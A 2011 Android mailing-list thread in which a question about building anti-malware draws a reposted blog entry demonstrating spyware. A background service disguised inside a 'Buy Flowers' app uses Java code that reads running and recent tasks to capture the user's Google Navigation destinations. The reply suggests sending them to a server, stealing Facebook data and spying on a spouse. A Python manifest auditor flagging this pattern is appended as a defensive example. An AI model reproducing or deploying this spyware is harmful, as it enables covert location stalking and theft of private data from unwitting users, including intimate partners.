Hello Ryan,
Thank you very much for your advice,
and for the code,
and for the humor! ("Don't let spouse buy you flowers -- it's a
front!" Haaa! )
It is really nice of you. Thank you!
Fal
On Sep 16, 1:00 pm, Ryan Mattison <[email protected]> wrote:
> Hey Buddy,
>
> I responded to your post in a blog style post because it is
> cleaner. http://www.ryangmattison.com/post/2011/09/16/Monitor-Android-Navigati...
>
> Hopefully this gets you started. I'll post the response here as
> well, but I don't think it will be readable.
>
> Monitor Android Navigation - Malware
> By Ryan Mattison, 16. September 2011 12:24
> There was a question on the Google discussion boards about how to
> write malware protection software for Android. I think a good
> approach to this would be to first write some Malware polling
> functions.
>
> Post
>
> Hello everybody!
>
> I need your help, please. Boss wants me to create an Android App for
> preventing all malware, known and unknown, from actually executing.
> So this is what I think I must do, but could you please validate?
> Thank you!:---
>
> 1. I must create a rules set of acceptable function call flows
> which every App must conform to. Any App that starts executing a
> strange function call sequence is considered malware and gets killed.
> Can I create this rule set with the on-device SQLite RDB?
>
> 2. I must create a service component running in the background.
> This must periodically poll every running App and compare its function
> call flow against my rule set RDB.
>
> 3. Can I achieve all this with just the Android SDK? Or will I
> have to use the Android NDK as well? I don't want to use the NDK
> unless I have to.
>
> 4. I went through the very helpful tutorial "Understanding
> Android's Security Framework" by William Enck and Patrick McDaniel.
> Is this a new Framework introduced into the Android Libraries layer?
>
> 5. Any good book I could buy to guide me through all this?
>
> Thank you very much.
>
> Fal
>
> Let us assume we have a thread spinning on a separate process
> indefinitely after our "Buy Flowers" application is downloaded off the
> Market. The information we want to monitor is Google Maps Navigation
> for Android. Where are users driving to & when. Our application
> will poll every 20-30 minutes since the history stack will retain this
> information, so it doesn't matter if we catch it in action.
>
> <service android:name="com.ninja.who.StealFromGoogleNavigation"
> android:process=":UpdateFlowers" />
> I'm fairly certain in the application manager it will now have the
> flowers application open. If the user has any questions, they can
> expand it. It'll show process UpdateFlowers. They'll go on with the
> day.
>
> We start the polling, we should check if Google Maps navigation is
> running. If it is we'll return true. For this application, we are just
> going to catch it while running.
>
> private boolean IsNavigationRunning(ActivityManager as)
> {
>
>     ActivityManager as = (ActivityManager) context
>             .getSystemService(Activity.ACTIVITY_SERVICE);
>     List<RunningTaskInfo> rutiList = as.getRunningTasks(100);
>
>     for (RunningTaskInfo ruti : rutiList)
>     {
>         if (ruti.baseActivity.getClassName().equalsIgnoreCase(
>                 "com.google.android.maps.driveabout.app.NavigationActivity")
>             && ruti.baseActivity.getPackageName().equalsIgnoreCase(
>                 "com.google.android.apps.maps"))
>         {
>             return true;
>         }
>     }
>
>     return false;
> }
> Using the ActivityManager, we are looking through the running task
> manager for the Android Maps application.
>
> Following this, we want to see what address they are traveling to.
> Since it is using the public intent system, this is easily traceable.
>
> private String UsersDestination(Context context, ActivityManager as)
> {
>     ActivityManager as = (ActivityManager) context
>             .getSystemService(Activity.ACTIVITY_SERVICE);
>     List<RecentTaskInfo> rtiList = as.getRecentTasks(1000,
>             ActivityManager.RECENT_WITH_EXCLUDED);
>
>     for (RecentTaskInfo rti : rtiList)
>     {
>         if (rti.baseIntent != null
>             && rti.baseIntent.getAction() != null
>             && rti.baseIntent.getComponent() != null
>             && rti.baseIntent.getComponent().getClassName() != null
>             && rti.baseIntent.getAction().equals(Intent.ACTION_VIEW)
>             && rti.baseIntent.getComponent().getClassName().equalsIgnoreCase(
>                 "com.google.android.maps.driveabout.app.NavigationActivity"))
>         {
>             rti.baseIntent.getData().toString();
>             String addressURI = rti.baseIntent.getData().toString();
>             System.out.println("AddressURI: " + addressURI);
>
>             String googleNav = "google.navigation:";
>             String titleNav = "title=";
>             String queryNav = "&q=";
>             if(addressURI.contains(queryNav))
>             {
>                 addressURI = addressURI.substring(addressURI.indexOf(titleNav),
>                         addressURI.indexOf(queryNav));
>                 addressURI = addressURI.substring(titleNav.length());
>                 addressURI = addressURI.replaceAll("\\+", " ");
>             }
>             else if(addressURI.contains(titleNav))
>             {
>                 addressURI = addressURI.substring(addressURI.indexOf(titleNav));
>                 addressURI = addressURI.substring(titleNav.length());
>                 addressURI = addressURI.replaceAll("\\+", " ");
>             }
>             else if(addressURI.contains(googleNav))
>             {
>                 addressURI = addressURI.substring(addressURI.indexOf(googleNav));
>                 addressURI = addressURI.substring(googleNav.length());
>                 addressURI = addressURI.replaceAll("\\+", " ");
>             }
>
>             return addressURI;
>         }
>     }
>     return "";
> }
> This is older code, there is actually a way to print out way
> friendlier messages. I'll leave the exercise up for grabs. Very simple
> to grab the address you navigate to on your phone and send them off to
> a server. Don't let your husband buy you flowers using your phone, it's
> a FRONT!
>
> To expand on this exercise, you can start stealing the Facebook Share
> Intents. Get photos, messages, updates etc. You can steal a lot more
> fun information from the Facebook application if you work at it.
>
> Thanks for reading,
>
> Ryan Mattison
>
> On Sep 15, 2:43 pm, fal <[email protected]> wrote:
>
> > Hello everybody!
>
> > I need your help, please. Boss wants me to create an Android App for
> > preventing all malware, known and unknown, from actually executing.
> > So this is what I think I must do, but could you please validate?
> > Thank you!:---
>
> > 1. I must create a rules set of acceptable function call flows
> > which every App must conform to. Any App that starts executing a
> > strange function call sequence is considered malware and gets killed.
> > Can I create this rule set with the on-device SQLite RDB?
>
> > 2. I must create a service component running in the background.
> > This must periodically poll every running App and compare its function
> > call flow against my rule set RDB.
>
> > 3. Can I achieve all this with just the Android SDK? Or will I
> > have to use the Android NDK as well? I don't want to use the NDK
> > unless I have to.
>
> > 4. I went through the very helpful tutorial "Understanding
> > Android's Security Framework" by William Enck and Patrick McDaniel.
> > Is this a new Framework introduced into the Android Libraries layer?
>
> > 5. Any good book I could buy to guide me through all this?
>
> > Thank you very much.
>
> > Fal
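
A reviewer-side check for the pattern the quoted post describes, as an added example that is not part of the thread or of the quoted blog post: it audits a decoded AndroidManifest.xml for the GET_TASKS permission (which getRunningTasks and getRecentTasks required before API 21), network access alongside it, and a service placed in a private ":" process. The sample manifest is constructed (only its service element is taken from the post) and the finding names are hypothetical labels.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace

# Constructed sample manifest; only the <service> element is taken from the post.
SAMPLE_MANIFEST = """<manifest
    xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.flowers">
  <uses-sdk android:minSdkVersion="8" />
  <uses-permission android:name="android.permission.GET_TASKS" />
  <uses-permission android:name="android.permission.INTERNET" />
  <application android:label="Buy Flowers">
    <service android:name="com.ninja.who.StealFromGoogleNavigation"
             android:process=":UpdateFlowers" />
  </application>
</manifest>"""


def audit_manifest(xml_text):
    """Return (finding_id, detail) pairs; the finding ids are hypothetical labels."""
    root = ET.fromstring(xml_text)
    package = root.get("package", "")
    perms = {p.get(A + "name") for p in root.iter("uses-permission")}
    findings = []

    if "android.permission.GET_TASKS" in perms:
        findings.append(("TASK_ENUMERATION", "requests GET_TASKS"))
        if "android.permission.INTERNET" in perms:
            findings.append(("TASKS_PLUS_NETWORK", "task data could leave the device"))
        # From API 21 the task APIs mostly return only the caller's own tasks,
        # so the exposure applies to installs on older platform versions.
        sdk = root.find("uses-sdk")
        min_sdk = sdk.get(A + "minSdkVersion", "1") if sdk is not None else "1"
        if min_sdk.isdigit() and int(min_sdk) < 21:
            findings.append(("RUNS_BELOW_API_21", "minSdkVersion=" + min_sdk))

    for svc in root.iter("service"):
        name = svc.get(A + "name", "")
        proc = svc.get(A + "process", "")
        if proc.startswith(":"):  # private process, listed under its own name
            findings.append(("PRIVATE_PROCESS_SERVICE", name + " in " + package + proc))
        # Fully qualified class name that lives outside the app's own package
        if "." in name.lstrip(".") and not name.startswith((".", package + ".")):
            findings.append(("FOREIGN_PACKAGE_SERVICE", name))
    return findings


if __name__ == "__main__":
    for finding_id, detail in audit_manifest(SAMPLE_MANIFEST):
        print(finding_id, "-", detail)
```

None of these findings is proof of malice on its own; they mark manifests that deserve a manual look at what the service does with the task list.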